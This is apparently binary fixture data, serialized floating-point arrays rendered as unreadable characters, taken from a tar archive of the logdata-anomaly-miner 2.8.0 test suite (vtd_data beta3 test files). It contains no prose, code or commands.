;CG?bSG?)|,G?ㄋG?ZVG?[UG?xokOG?yGG?H9G?`*G?- vG?=mG?ŃEG?r3ܧG?# G?۔Җ G?w|G?Uq`G?$#V_G?}ШsG?AwG?ݑ(yG?#[G?Sg0_G?f64G?ǝ^ɗG?aG?TG?vC>G?}FG?:G?e{G?{SG?HaB5G?ƭG?x%G?/G?'IZmG?>FCG?+\7]ݠG?䌻[G?wG?3[`G?84XG?AjJ G?>b6G?ΪDF G?5#]G?H#2G?碃G?%G?hv/G?nsOG?=#ŎfG?@7G?)e~G?{ÀG?胇-G?+.G?&QRG?쎻5G?BkG? G?; ,G?ExG?1ӱG?}&7~G?_v>EG?EfG?)G?'G?⻍7TG?bG?h>G?J;G??~G?Iw ǛG?TG9G?l$G?@$G?[*UG?녏ԼG?0PG?呈ZdG?º)G?G?D_ G?eG?47_G? ^G?idbG?,G?ꚡ. G?e\>G?f>7WG?Ifp/G?Ni8G?PG?ߣʤ_|G?`X&G?m; G?xےilG?G&pG?T1G?uR_G?ڦOoG?$puG?ЩG?(\G?nT%G? 'G?Ok-gG?dJG? iG?= -G?/`-G?CWG?NG?M-zG?G?) G?:G?&yvG?2VIG?\ЮHG?2TWG?PB>CG?ϿwG?J`G?a,\G?۷f~>G?[JhG?B .G?[G?Q }G?ڿNG?ꫡqžG?B0G?r?pG?cUG?4HqG?9G?dG?~AyG?3YG?2OG?M?G?!Е;G?NUG?ދubG?皶IG?؎G?-h G?]^UG?vG?~:eyG?l,G?G?<@>G?5G?&ه;G?շ9G?u G?K {G?<$5G?G?,cQG?žG?Y;Km'G?h6G?:]fG?,A֙ G?UXG?$VG?{G?ᛶ G?ցB_nwG?[IvG? QBG?u΀G?AG?㻀LG?NG?AG?~[G?|ˡeG??eG?NQi5G?j<nwG?rXP'G?'"G?۟[ G6G?L 9:G?WG?8v,G?iG?2G?<;G?x{xLG?Đ2[G?6/G?g̨G?LH )G?_G?r G?SG? G?M @G?7xSG?G?Ä2 G?*OKG?,`/@G?LpG?᧱;%HhG?eG?Dg:1G?fUG?ͭG?-&fShG?}KG?ZgG?cvɩ'G?zG?Yѷ~1G?ߞiG?& G?TWqStG?<[ۋ!G?G?c)7G?lC|G?y`ŔG?.9G?/ukG?}G?E40G?_IG? 88G? 5GG?%^LG?C&G?oG?d6qG?uvBG?qGMG?T`G?qG?aoG?9ZKG?铜zG?4EG?S+pG?; G?&[G? -G?};G?p,yG?-Yx)xG?߾߸G?۪cF^G?I'-G?h6G?.G?BG?@avG?/G?mon=G?뚨wKG?n-o3G?]ЌvG?nLD+G?rex憾G?YG?_$QHG?wl`VG?~4!;XG?9G?Jl 2IG?Q;7G?2G?Z‘iG?uG?^Z G??sYG?}B G?{h U G?㖠G?ddIG? +\&G?w2G?RDm}G?", ֫G?QG?ɖ>dG?[^>G?hc_t^G?yx8G?? ~G?$CeRG?]'`G?G?&G?I~3|G?:ṖG?[qG?iWG?bN_1G?L"k)7G?疊qG?օjDyG?p=DG?NG?羴\&G?VuG?7>G?lO'G?߰w[e](G?t G?ߦ3G?>=َG?,۞IG?r~G?} :4G?ӵG?uNa7G?9dG?ަG?l<{H G?p쁉G?ޡtykG?뭱.cG?_8ʄrG?7NigG?鋹G?|4>G?$WG?CtG?) AG?6,zG?@G?ɋ)oUG?"G?v,܇]G?郈-CG?6>kjG?G?3$Κ*G?N}j_G?ːZv G?z*x=G?菨5G?pPZºG?wstG?qѧG?귤MlG?'pG?i@G?N8G?BG?m@G?K$G?q/kG?a&G?}5L4;G?%4 kG?+sG?xgzG?ѽ{G?c}+!G?Ӱ]TG?q(G?M~G?(#G?눮SyvG?&lG?]4#G?U G?YFG?MG? G?QG?t9G?:,G?rjIG?D*G?xvG?ï3,G?Aʕ羿G?S DG?ϬVv[0G?cG?}S1G?싄ȽG?쵰G?Ȳ7G?8MG? HvӓG?Z3OgG?q3G? qG?ᒢpzG?:W?G?F[@G?ڂG?:tG?̏uPG?)ٙG?:4"ZG?sf5iG?XG?膜ܚ^@G?HG?mL6G?GZ;G?YG?B\G? ǰG? ]G?{:( QSG?yJG?N2G?1*E#G?TݞG?p#G?1PCG?7G?ћdZ&G?톹6`G?5G?ΒsPG?0 sDG? G?MfY=G?'fG?5G?P|{G?ذ$bp;G?ʯ1fG?m3(G?$ifaG?ݏ}G?YG?t(=G?}A G?k7OG?"DQKG?SbVOG?LϬIG?ޕT,G?ÕG?KaHMG?)ѣG?poEG?#VtG?'G?i2*G?1G?M1+G?YZG?mEG?I"?G?`G?zUpG?cdPG?8b"G?iE)ZG?Xm{\G?- i1jG?_3u +G?zbN; TG?›eG?}yG?(>g1G?oj? G?E$G?]@1G?儜G?wݮf2G? G?⎖֪;G?t_G?X G?$_&c.G?"G?O?bG?0G?BG?ϼmG?3/U+G?̱G?yl^G?YG?$G?ℜ(G?0z3G?KG?15lG?X^/bG?xو}G?)LG?$G?¸*G?CbdG?㹯)G?3옢$G?up\G?ujWS[G?!9+kG?waG?ͥG? F G?8NIG?W[G?.wG?K!G? 0ݟ9G?VHAG?|X{G?D߬G?,reG?EG?5 nG?4+IG?TN:RvG?L1G?WD|G?mϟG?CG?/)$G?au$nϾG?Kk]G?m՞G?}ggDG?XڕG?RSG?SlnG?A7G?3jG?SГG?5=!G?pnG?;G?٬շ8G?twG?IO\ G?U:G?؁G?ɖzMtG?i +G?mBG?ݴrG?VM1NG?qZwG?<)G?5l{}G?G?G?ˏG?cG?7eN.{G?UQ}G?@ ؞G?ܖdG?DG?T YG?xðNG?瓬6YYG?9pzҠG?uǼʪG?0߯AG?RPG?樊A^G?sG?쐥-G?mG?W2G?J!^G?ަ^gbG? iDG?ܰ \G?4QyG?brG?wP4G?lOtG?놼1G?> ҖG?꫇k64G?>5G?꾧WrG?囪+WG?>#eG?lN_G?9[G? ^FG?4m%G?㗴OzG?FG?MmG?rVG?!nG?1طfG?]-G?WpzoG?"W6G?]wG?[3Bf G?LUG?q? )G?xF9ߗG?]KG?邗UG?*l{iG?䘦UdihG?⼪e:rbG?ؕ*`|MG?%G?5sG?Q ]G? r}G?CX4G?>A^pKG?=dG?Y?AoG?iHc2G?ԕTG?QWG?܃ZG?Ml3G?\vG?,Y -G? +G?>z'kG?阳3G?v4G?HOG?'z AG?4xbG?ԝ6G?굽|G?@bG?m9G?>}G?轣'G?cG?U%G?n8`G?ى|ڻG? θ0G?Q6G?)AG?1G?F#U{G?G?㳫Ä0G?TG?G? gFG?̊ G?;tG?Q !G?WG?ЙzG?:6<G?Rq G?c.;B`G?`z7G?LϫaG?s@*G?uxG?6\qG?XG?vs}G? \G?ЖZidG?PzHG?V3*yUoG?^o-xG?lOG?SG?ǑJbG?O¯hG?%tG?dG?q46G?vG?VeG?#G?8\G?DT2G?L/G?yG?vpG?/ G?em0rG?F0hچG?+iG?I+G?u}qG?͐G?5k7G?]BuG?(=?܆G?7X|G?->bG?f&WG?otG?s)G?DVAG?l-$A%G??7G?̚K G?`-G?5p _G?5I.G?IjhG? G?}zuf*G?-zG?dE7G?+fG?;G?S~7G?Dq!G?eG?Z`QeGG?,G?랉ۣ5G?"4i4G?{A"G?8˔G?RqG?X-RG?H,NG?Ѩ'ːG?;%VG?G bhG?̙}Ry;G?iB\G?iG?^@iG?bG?1ùG?zVG?zXEY=G?33G?=52G?tjxG?.k"G?s/D \G?ڌ˿G?-tjTG?G?).G?[%G?$G?u~ɩG?yG?yJjRG?]`G?ݷ𐑾G? DG?ۣ&8G?+J M*eG?d(>PYG? ORy`G?vG?䃔f kG?౔kG?ꡋ~oi:G?J\G?| G?&G?&RG?rlaG?IG?G_G?E0SG?|]|}G?LTG?xG?]o G?N ?G?r]JG?eGG?jeG?=G?済Z}G?GšG?SYbUG?FoG?9(G?D{}{9G?>v G?ng] G?9揹G?R6G?]$G?)P[G?I^&G?HEG?Q8G?L{G?^M`G?8G?ܽѬdG?@G?6FqG?QG?siÔoG?Љ3iElG?%}fG?UG?kzbG?׮ZΣG?L,Hw9G?=BG?)`.G?OV5jrG?;IG?RzyG?g&ilG?[A.IG?rG?`OG?lW}:G?;.G?yLG?-i0G?H:G?xG?1H.G?DG?J@G?f`G? NM'[G?K2 G?WG?+G?(tG?2ԿwjG?ጽG?,VG?;jW+}G?n]xG?hG?٘G?䈐S&dG?igsj8+G?4KG?RZG?jyG?ؚ$G?ݮBG?x-G?e62G?xKG?hIG?OvrG?OG?篘G?\B(G?zkLG?OOG?$kBfG?ݽ!2G?JJG?(`IG?WBZG?ƀG?^>*G?άBrG? +[lG?f AG?0'@G?W([9G?LqwiG?A̴@sG?ZG?8ӮG??0FG?"G?ʼ0.G?սG?Y^#G?d6ȳG?9G?썉/G?d!1ޅ4G?㭎V}G?9wG?ՌG?SWG?G?MG?G[G?ٌG?:ث;G?ny;\G?5G?YY$G?#,G? EG?ItJG?+G?"U;VG?ߩ%HG?䶀Lj2G?ۉWG?X`G?ȬG?ѺPG?|G?垡!SG?t; G?c]G?bXG?ғ"cG?6DG?hbG?bgEG? G? wG?.)SG?tiG?a"nmG?}G{G?,G?5uG? BG?;G?弔vG?wCH@G?͌syG?eG?$azxG?A";]G?[(fG?"+5 JG?ΤG?'G?vG?sG?G?(!G? 'G?5G? e G?,;4G?hG?ݠ]u!G?G?%CG?g{OG?hBHG?EB|G?Ջ}㹘G?G?#YG?DEnwG?0ZhG? G?G?9LqQG?mhRG?'m>G?ݦ5G?G?*9G?칾G?I`DkG?c HabG?XOp@G?飚؅G?ZDB|G?ݠ jG?2q5G?utG?EG?ykuG?繦(G?:t^.G??p>GG?>lVeG?dbG? }vZG?XɎG?;veG?8=G?UG? /G? d@G?ٷ`r)G?PPG?: GG?ӻqxG?LG?( cG?ޖG?u`A2G?ګJlG?>nNxG?뷤.rG?G?n+r+YG?rI G?EðG?"B6G?4TG?ZDKG?X:f G?pG?2qG?4tfG?6 G?kb@G?A3G?N KG?P:G?9r_[FG?AG?]DwG?/EG?GG?[G?_)yG?蘎qd G?:%kbG?O`G?{,FFG?nhoG?"|WG?5ERG?qarP(G?D׳G?P>CG?Cu=J G?U}NG?蘘l=G?~k(sG?60^G?{&G?LbG?X4G?G?'\JG?UJH&G?_G?tEG?2G?f/G?F,G?=ڨMtG?4~FG?3G?VG?vG?& :PG?G G?z1G?$n G?V?^G?[ vY&G?k"KG?:'G?`L}G?G?L`$9G?(c1G?]qG?n5G?2- G?(@jLG?Wv bG?)j}6G?`1AG? &G? J/;G?I$G?儡r1G?S G8]G?6G?b~|tG?Bڨ!G? 'G?a,&,KG?*pG?i.G?ˤ9pG?YG?!C+G?h |G?C=@G? =G?,x4G?4PG?ԑEG?AgĶG?y G?PMG?VnG?ʋ 1G?~e](e](ee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/beta3_data_test3000066400000000000000000000432761500476301700275270ustar00rootroot00000000000000F](](G?ǡD6G?.mϥG? 7N9G?JZCG? pyEG??oG?8G?yd&%G?1x/G??83G?ԸJ-G?ĢuPG?I`G?܏G?mXG?շ;G?7U'G?ʚYPG?eTn1]G?U[JG?s˛sG?,6̮G?1YwG?٪-Z[G?Pw xG?=ڷ*G?pmzG?ȜdG?$YG?QG?MH%G?R< G?QEG?gC!G? r)tG?òm\,G?rNG?_G?w4ȽG?;G?o@O2lG?͂dVG?\JG?2|G?|G? u˞`G?"AG?[. G?`IGG?>JG?чMoG?˥h.G? {<G? Wj)G? G?dh 4G?v:G?8p0=G?ПDÄG?X,MG?ť;_G?͚TG?gkBG?٢մvG?Lr6G?̺hG?כYG?J.WG?+4GdG?0թG?HeڲG?"G?7x9G?Zڪ| G?|7G?5;sG?% 4G?˭G?`G?ٺTOG?͙fG?Km?G?\}G?rz:G?~kG?c#|"G?:%bG?Ʌ-6G?#G?hL'G?R:U7G?G?ȍ0w=G?e= G?.G?QqVlG?:{%KG?g!1MwG?8,hG?8G?|#MG?vqWG?62Ñ$G?Jz~G?ӠtRG?#\G?0~VG?CvG?Ǥ(G?ŻPG?m G?x<9G?6G?ɋ0G?n&rvG?G?nuG?턆ŬG?:b3& G?ɓE@G?~ͬG?/lyG?pG? ݤ G?WbG?ԂqG?dʟRG?+G?اcG?eZJHmG?ɁOG?U G?k 0G?G#v TG?豸UsG?1 G?&G? `G?P|«G?0#G?TsFG?"?RG??VmG?G?;j.G? \lG?65tG?$  G?}U!G?Ë:!G?AJG? MN?G?7ݥG?||I)G?B7$؀G?ԓ'eG?}l7G? iG?r1G?XOJlMG?P*yHG?lr _G?܋cG?Va}G?hRG?9G?{ҦG?KG?ү% G?5G?=vN?G?㳫\`G?XG?ĐbҤG?e7G?&gG? ]ΎG?%WG?NmG?g΍ G?WG? $G?>2G? tlG? SgG?woG?޼6:G?3:G?L!&G?i!7.G?݈,„G?DVrG?v{lG?_;CG?KÔG?v2sͧG?ذkzG?,%^G?ͱKG?"bG?=ONG?6"JG?^[٫vG?Ta3\=G?кg|+G?o^s{G?ԽnG?!{G?ԙM*`G?ٗ^G?@0a:pG? 1G?<G?ם G?+fM&qG? VG? G?֮;G?r~G?[ɂG?ֽRÞG?D54qG?~nG?P2G?YdAG?ݯ G?ǣG?9hG?Я\7l9G?WqZG?L1G?z.G?IEo G?vEWG?"G??"G?zdcG?܎8ԡZG?r"G?~NUvG?|xG?nbG?2K"GG?L @2G?? G?p؇;kG?*c+|uG?P]G?"G'G?bG?Έ`DžG?,SO4G?rG?L5$4~G?7BG?=G?,yrG?g@G?ä00G?yuPG?G?5uVG?̸yuG?op9eG?e>G?_!G? qNG?ZH>G?ytzMG?L*sG?|$PPG?PsrG?pG?ڝw.rG?8G?@YG?"2)G?'ġ~G?ж+G?G?VQ9G?\L'G?ܒrl&G?rVG?I.EG?ׅ5G?5y_G?ى WG?LG?ThG?%LTi G?}ZnsG?o G?吇G?y9hWG?s G?/idGG?hASG?|G?BI>7G?aG?~-1G? >G?|%hAG?jG?Q 7G?T[G?": G?5h|G?x6\G?E̽.G?,G?l.G?аuXhG?ƿgh+G?hnHG?*cG?ޚ|حG?guG?T G?[nw'G?ܱ|y#%G?LXG?xojG?QAXG?,}՝OG?(J G?BG?P/G?Ϲo+3G?@}G? 6G?µE8-G?RHG? G?2!G?c<&iG?ѵ G?ԦWG?ί}G?Y`G?NcQG? hG?% ]XG?@vG?e%G?2hG?r{_G?ycoxG?rƢhG?+{PKG?uoG?Ƣ~aG?OoG?/yG?ڐܨlG?֋+OG?yz@G? z ~G?ĒG?ϕ{aG?S6G?ʵ,)=7>G?bc_F"G?u!UG?v`8G?6q9G?oG?3cgxG?ҘﮍG?5Lߞ G?ٰ_1G?ܖ[G?x;?2̗G?k +7zG?f$>i>2G?HלbuG?fG?фaG?zG?G?G?IG?',qG?]J IG?ϻ^G?R>G?YhrG?LJ gG?G?#@reG?i] }G?4ey G?㖏-G?SG?Y,G?.IG?ŋ]ްG?plaG?;ݛG?RR'G?C}*tG?+G?Չt%G?+vzG?%e%+מG?|XG?ѧ~\1v^G?9b(G?MG?ښTRG?Ӗ 0-TG?㮗YG?p"a9G?֑ ÛqG?mG?pDnG?cUOG?8h!ĤG? G? G?]>G?Ɠ`zG?{"G?YKG?G?u=8G?ҥMG?@xG?ѦQFG?Nj G?ɓqd;)mG?jkG? G?Ճ4)G?(z_#G?"G?ݳG?9+(G?\ʕG?w}iG?i_G?[R\G?:׾p"G?<-1qG?[HG?WG?ӥv`%{G?շ2ސG?PG?G?w'G?0ЍG?GlzG?,h9uoG?QdjWG?ɧ G?NLG?FM}G?*O>mG?ӋG?*)G?^]G?xCDG?reQG?*嫱{G?a@NG?9IG?6BwG?ӄNbmŠG?[⋘!G?,t[G?1`$(G?f5BG?6y]G?͔S&NG?`vG?ĸacG?׈QӀ G?_G?$rG?A0G?3RNAG?1LcG?O^ 2VG?iZG?-G?unǡG?ΒFG? vG?>Ŭ"G?·JtG?y={[tG?G?%G?锞G?̖=yG?FG?Q@'g:G?ڿ3QG?ŽYG?-@]G?ښW-OfG?p1UG?9uV,?G?6G?!G?@>C G?3G?Vo.@G?Ⱥ mG?d,G?u`(G?c~6B#G?HNG?"`„G? ʐG?RQHG?ⶡY'G?yR G?GG_7G? =G?uG?nw+G?u@G?`K#|G?˾URkG? ΟMG?a~MG?W,1`tG?i6G?ȝG?&Х;G?K G?KG?0\G?7|! G?ۏn^YG?slG?%QBaG?NkG?` 5G?nG?#D6G?G?թsI)G?jHLG?eSY"G?'G?bŪI{G?i7F]G?``RG?/K\耼G?xcW>G?ᐖiG?;YJG?BG?a!WlG?WVG?2G? LG?M6G?t>Z5G?ש9R^G?CnӯG?1G?3YܱG?Ğ}*BLG?zYčG?#E G?t2~G?ћ%ߚ$G?vG?ʮG?܈G?5vG?X|(G?½7jG?քuG?>ctZG?|U\G?G?LG?7ʭ G?uG?w/\G?pg<_G?ܳ3 KG? 8GG?АdajAG?Z_6G?׮· nG?!6:G?")ukG?Չ9G? >G?1٤kG?ϳM|0:G?C07G?[G?- G?՜Q9pG?UG?Iǣ*G?X G?az-G?iYPG?mZx G?ꦑG?ɀZV3G?߯pOLG?ϝ.G?EG?WqG?y.G?AqRG?$[nmG?aڷ-G?׃\mG?ƃ 0G?FxTbG?ƾ,G?nG?6#ͫG?r2qG?nSnX| G?R7wOG?M-G?G]*#G?h'}G?HeG?tzG? cu9G?a7lG?*]G?Z#G?͆G?ŦF|G?zG?>bG?M'1G?،JG?ʐ`W^c G?~Y3UG?_mG?-G?lk??G? :9@ "G?fPOG?[S-G?ѰX?tG?fCG?ϣ^eG?ޱ&G?.G?ijG?:C~G?_G?g~G?X6A~G?eBG?ū/+T G?7w_G?ӆtG?#PG?Z(.G?Ԭ3KG?@b?G?B*G?^䧿SG?).G?;׭fG?zkOG?FxG?lG?Y;G?ͽCQcG?#8G?*IG? )gG?bG?ԵvG?ЃepHG?ڝnA\bG?0wdyG?38wG?.oG? G?:G?}:G?QlgBG?yY|G?RG?b_;G?)G?vF8 G?ۥnG?֌4rG?6BUG?%! G?QZ|FG?qMZqG?gBG?r EG?q;fG?T'G?ˤ]G?Ƕ"G?*JqG?eNuBG?#HC_G?UQG?LtHG?EG?(F%1jG?щ:QG?+n"TG?EݻG?c,$G?ȀoG?(;PԼG?Ÿ*G?9$נG?!ɴG?Ѣ5:G?2Z89G?tS2G?} G?~UDG?,xfG?=*LG?#G?,?drTVG?Կi>G?y/G?ه4G?{G?qJG?C4&G?vbG?cPGTG?^v/G?X\G?᪷DG?$G?%ЪG?}R;G?|7)SG?ځu:G?7:6G?7zU G?sϩVG?œK@G?͎j,G?c:{G?sxG?چ>N-G?qG?ӛvG?)^&?G?ߘmKEG?RϵYG?ӯ$ۍG??cG?IB'2G?`(TG?ױ$^G? {4kG?wi,G?AG?`7l;aG?¯±G?vBqeG?؝zECG?e67G?Ħ *G?G?]0sAG?X8G?ZP'YdG?G?# UG?LG?҈zG?ѾkG?_1uG?Q&G?8\lG?/KRG?vn3G?HyG?bJ1G?xBG?fG?5yG?Ӷ 籇G?ʚrG?pq/G?\cG?+Ǩ6QG?ݑoҽG?ặb[G?ZG?ɪNկG?vUƄG?=jG?bWF%G?бGG?1QnHG?sG?A'G?ʶ cG?Ql$G?%kjG?HwG? L3G?(G?G,G?X+G?_1G?>G?TA{}G?ԑ6:P#G?Ҏ i1G?ڼ[X.G?)[G?$K}MtG?zMhG?w'_G?4'rRG?rKյG?ߝG?^c-G?+G?ŋ G?z.%G?݇Q{G? Ot?G?<W|ȣG?}sG?EIjG?JƭG?-9tG?ad/[G?y,G? +xG?h"xMG?V" TG?Ɖ?G?AtG?òG?܎^G?+G?YzZu!G?M G?6'_xG?8 ](G?uG?·n\G?NoG?U=AUG?G?IQG?h5LRG?UPG?Yrf G?f_y5DhG?N,}F G?:k&G?Q[G?XUG?~zqFCG?ՑG?yN\G?DSG?_Q;G?^ G?߽\G?OG?[ے":MG?y޴G?Ņ AŹG?W֬G?N$G?dzG?#D G?埒G?LQu#G?ג(B3;G?PNMG?{0G?e'qG?֊)ُDxG?Yj+'\G?G?!L`mG?pwG?ID7G?揱G?]5jOG?VtkG?їdG?1.lYSG?> G?r iG?O qG?%~@G?jG[G?G?BW)^G?Z0]G?FI:G??`5G?OHG?պ#G?$&}G?c3G?slDG?wkG?s}UOyG?ΚatCG?YuׄlG?ن.n-QG?aLqG?钚G?~X>mG?6c5G?oG?sFnOG?֝G?܀}G?odG?HHG?1-G?TG?VԕwG?R5G?VXsG?7ApG?֛WDG?ǧҨG?(5CG?֝%G?f]ъG?~p3)G?@t#.XG?(gWG?ߞPfG?4G?*~}~G?1g?fG?AZcG?G?aG?Q#G?ʝ/ G?ʦ wfG?(XλG?QG?+DG?@$pG?i9G? "1G?ZG?#ƄG?5:jnG?0,G?cHG?-+f6G?^aG?G?!%xG?ıket;G?ر]G?6h)G?XґG?<>G?48G?O=3G?Y?1G?6'oG?6F;EG?pG?qjuG?f7.vKG?هG?UѿG?{ϟG?{UsTG?òl?G?ʋǪG?XG?ōJG?%5G?ל.JoG?~: G?iVzG?kI~G?~K2hG?1s G?1qNG?Ԥ) G?ֹYa G?PeG?O}G?Žfؼ#G?Z~G?,}͎G?͓T9jqG?jBq&G?%` BG?B5rG?נŐ-ƦG?5Z G?aąG?S^G?˺G?G?A]G?}cqG?qG?y$rӋG?޸0,G?_MSYG?kVG? 굜G?rEG?t[gG?<܆G?ԁuG?L:G?;&G?0,MuG?ssG?\A hG?+G?1NljfG?:G?G?֪ڏG?իBG?5WmaG?ncG?cL2}G?bmG?ܨ0 G?k_܅G?r#.G?O&i@bG?bЎG?rw]G?H LG?pNG?©e2gG?{G?ۮ G?A VG? "֟G?=gG?кWᘩG?kD8}G?ʲjG?h۴G?ΡU+XG?'21G?͜߈G?_bG?lV$G?[yw.G?c uRG?+ڸG?5`OG?P%xsG?%G?\v#G?e7G?mG?*$G?OZu]G?@Z[G?R|Q`G?Gs>G?i?KSPG?+;rG?I5G?rt0G?ܕPLG?Zi!G?GrýG?ƚ+:G?x% G?M~2QG?SCG?B/J7:G?XwZG?69)G?s0&G?!G?\RlIG? G?g8/iG?ƽRg2G?LG?h:TVG?׈iG?VTG?#G?qcIrG?΁uE 2G?$8jBG?G?eG?~RUEG?G?@u{&G?`G?ԏ'RuG?RL G?ӀmQG? G?fM@G?oG?ۗN͂G?UG?؛XG?Neb_G?\G?ĮaG?ػ pG?sWeG?Ɂd'G?WG?#G?Q2JG?ڥ\FNG? S0TG?otG?9*RTG?-#G?SGʁ,G?>eG?βΒ?G?z CG?ȏ G?M3_G?NKG?Fd%e](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/beta3_data_test7000066400000000000000000000647021500476301700275300ustar00rootroot00000000000000i](](G?G?L=G?4 !LG?Q+$6$G?- G?ߣ: G?ǿoG?rG?Ӈ`eZG?$*G?_g\G?ՒMG?h3G?kUc\5kG?j!+G?f@;ˢ8G?@agG?ۆN?%G?ԴG?ɲQG? UG?v-G?h]G?uN G?#G?W WqG? G?Ƚ%wS%G?N#G?" b G?׍VYG?IYaG??KxG?4Ī G?Y{G?OgG?ȉRv_G?EG?HT"G?ogzG?3kK`G?uˢG?أpG? KG?àoG?֤haCG?Ϯ{G?9x8G?ᚕ>|pG?qQG?EK<ϋG?5^G?tuFgG?K ]5G?G? x(c<G?i.RG?neG? dIG?u5J'3G?VdkG?QlxG?>=,aG?4]lG?NG?(ϯg=G?q=G?}x뵗G?j/sG?+G?/:}G?SъG?ߒҞYG?נ/ڀn^G?'ɰG?ʊQTY+G?G?@G?F^-G?ω4G?% fG?7AG?5 }8AG?sVSG?5 ZG? ;G?- q}G?ȭ:9G?ѡ4\G?ǨJG?X]sG?J(G?bCG?G?=ʗ#G?g䒸G?֢vdG? Gw(G?׌xG?CsZG?aVG?֖RG?C3G? -pG?٥rPG?K(fG?)z~G?#j G??)rG?-IG?ɳ) G?mnÿG?d(J&G?Q?G?<'G?y<;G?ךG?H\ G?O G?Ȳ ʨnG?RTG?ҕ+E2G?ٶH`bG?EQG?*IG? WG?2ؽG?G?˺X G?˙FG?XcN[G?k(G?ܡ|9ĄG?ܫ42G?ӘK,G? fG?ӐnaG? ²G?ەݛ\G?T G?<ΊLG?ԤrbG?aT*G?îLG?eY G?!%G?кŬG?YG?[L}7G?S]G?l*kG?9oG?4RG?/6G?*G?jIBG?ڠ٠1G?z6WOG?Ҋ%^G?rG?!OWG?>nG?-GjG?Փ6RG?QYwXG?ApG?jG?N٧G?_zG?m}(4G?=CAG?RGG?ب(G?;|nG?·'[G?|{G?* G?q4cG?G?i8ٽG?Ϲ.G?7G?]28G?ԑmZkG?[s(G?sпG?(:4G?z8`*W9G?SZ G?AVG?Py%kG?ѧG?v;G?X)DG?ŸskG?uсG?[G?8!A cG?l JlG?̎ǽ&G?ۿTp?jG?\[SǦG?Չ@G?G?(+PG?YG?%.pG?+G?ȵ G?G?~{MG?lj8.a$G? xG?M-G?'{G?֝GG?ӗ#1G?܍)mG?Ĝ1G?^-%[G?͑G?УoG?ӖUG?lL]G?ס"G?H_ G? JV*G?&7\+G?jeBKG?}ARG?Ƈ>2G?ZG?G?!}G?bX9ZrG?l>G?G?mÿCUG?ZA6G?wG?ŖG?A&G?>בG?ؾĎAG?wG?㋦p>G?neZG?QnG?U K~G?~}(G?⊴XG?ζՖG?טpG?9G?:;SG?jo%G?8VG?E i[G?=geG??CG?zG?29G?~G?Y' IQG?9(G?kjnМG?%tG?U=G?ЏʷmG?PSG?==aG?^G?G?/hG?`BG?UqS2G?eG?3zqq-G? SG?RWG?տA$WG?,qG?-B(G?jٹ6G?X \nG?HsvjG?жP!G?޹(G?5TgdG?UxG?ՈePi5G?gUG?!G?ثM.G?b̔G?־G?NPE7G?v70iG? 2`G?Q1ַG?׭(tG?ֵ:G?骤(lG?љR}bG?G?(OG?щS5#G?PKG?'G?9CMG?GG?=;G?EnG?ȋf*G?yӍ*G?<>dG?䡗qJG?\G? ZkG?e9G?ɍ8߄G?ŀM~G?<䵈UHG?\G? jѸ6G?iG?'4v~G?15G? 6±nG?+ĽG?FG?/ G?iws7G?ܴf+G?PAOG?AmOG? Sl1TG?#:$G?ޢfNFG?އ~1ȊG?طWiG?TAG?QlzG?y{XG?UQ,NG?ΑcG?01v5G?dExG?4 `G?ŀ:G?mE*eG?*G?&G?7KG?(G?۶G?>DG?"NG?ɝAQZG?F636G?/G?FgG?·L*G?a\G?]fG?DG?=YP;G?pG?ے3❶G?& G?<;G?G_~G? BG?R`|G?d~0&G?'Q&G?P'G?^G?`kv>G?ɝ@ƕG? G? G?0|v'G?AHG?QIG?ܓڻ'/G?`,L'G?N.;G? i)}G?(G?;@G?z:G?Կ/5G?& 8G?ÔvG?Ֆt$G?Φ^nG?$G?otG?U"G?Y@G?π,$G?ĭ1 hG?@$94G?$BG?@QG?rG?4{"/G?2G?ؚTG?sQG?:yaG?" c#G?ã}n&OG?XG?M6-G?@ruG? xG?#M/G?xJsG?t4G?بG?e~G?9G? u^G?/xG?uӰ׎G?{7pגG?ziG?̦ePtG?,,ѿG?*rĆG?%LCG?fUG?;@G?!$ĠG?wVG?prG??teG?#'G?KxRG?$TG?uG?-&G?͈(G?o|]'G?EPǎG?#yFWG?%&M G?sBG?:CG?itՍG?R_ nG?MG?Ӯ]{AcUG?֋moG?TG?"+G?w`z*G?|rjG?װ;a"G?1G?˝0ũUG?9 zuG?G.fG?5^G?ON7#G?7PG?_}G?M& G?:G?juG?=HG?tR+G?ęXG?gkG?{)G?-cG?|3GSG?A/Z0VG?,{">G?ޜXG?o1G?tG?jNG?UpTG?T3ҰG?ppG?j:N\G?IYWG?ڒ塥fyG?۞xpIG?̐ݴqG?G?u G?JUG?uoG?(MQG?r؄AG??G?Ɣ[ G?J%® G?Y0_G?a7YG?§G?ޠ%G?HjG?s2,hfG?AG?ſ`G?3 QG?S`7G? IbG?5sHG?PxG?GG?oӇG?|]G?IgzƋzG?iG?JLG?9}#HG?ڥ439G?ڡG?4VSG?E|G?~5U#A3G?spG?͑ rG?|G(G?Ԉ,G?ۙ1iG?W NG?HzG?9G?ɶd wG?'DG?# G?bzjG?(5UG?ɃM2G?+~.RG?BH UG?oG?h'JG?*y~PgG?G?,ztG?PG?sxB?lG?EԪ̶NG?٠˫VG?Ե2G?A5{G?q\NG?{#InG?aN5$b*G?Z \G?tG?S*+G?!3G? a4G?ZJ6G?EZɗG? >G?!G?[G?$o e(G?BM)G?à=_G?сvpG?I5G?hK:;G?Ն!=:G?۶.G?ћG?YDG?"VG?iG?ЙxvpG? aDjG?U(V&G?]~G?½'9G?%[aG?צ紟G?ۜG?,G?_0jG?؟6'&G?Ue-HG?̀iyG?Խo}G?ރKG?٩1粹G?ڑPkG? _G?-详FG?d"G?g;vpG?ӧFoG?>SG?ؓ\AG?=(nG?߃XG?_G? xG?V(cG?ĴDVRG?93rXG?U:G?ŵ G?4vG?4h((G?ˏ|G?޿BحG?أ> ߞ^G?xHG?-xKXG?#xG?6G?R G?hnŴG?qŬ;G?G?\9@G?\!PG?4G?ן]LG?E6Z.hG?glݡG?}VG?#G?,ßbG?X'=]G?/G?G?G,nG?~IG?@sG?=G?lAG?j:01G?\BG?Ԅ?WG?3jCG?=4kG?GdzKG?>VvG?|CnG?eG?ϛXG?\vG?ݝMhNG?\p+-G?^G?LrG?#6BEG?-d;G?{IG??AG?n]G?.G?S@VG?и~G?# G?ݎ~7G?>EG?..6G?gS 